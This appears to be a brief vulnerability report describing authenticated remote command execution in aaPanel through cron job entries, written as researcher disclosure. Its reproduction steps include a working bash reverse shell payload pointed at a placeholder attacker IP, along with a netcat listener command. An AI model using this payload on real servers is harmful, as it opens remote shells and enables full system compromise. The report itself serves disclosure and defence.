This is authenticated RCE. Vulnerability Description During my testing/evaluation of aaPanel, I identified a flaw in how cron jobs are handled, which enables an attacker to inject and execute arbitrary commands remotely. Specifically: - An authenticated user can manipulate cron job entries in a way that breaks out of the software to the server. - This leads to the execution of malicious code on the server hosting aaPanel, potentially compromising the entire system. Steps to Reproduce 1. Log in to the aaPanel dashboard 2. Create a new cron job with the payload: bash -c "bash -i >& /dev/tcp/XXXX/1234 0>&1" (XXXX is your ip) 3. Save the cron job and trigger it (or wait for the scheduled execution). Start a listener on the other side to receive: nc -lvnp 1234 4. Observe the execution of the injected command on the server and RCE. Many thanks, Alasdair Gorniak/Hamed Kohi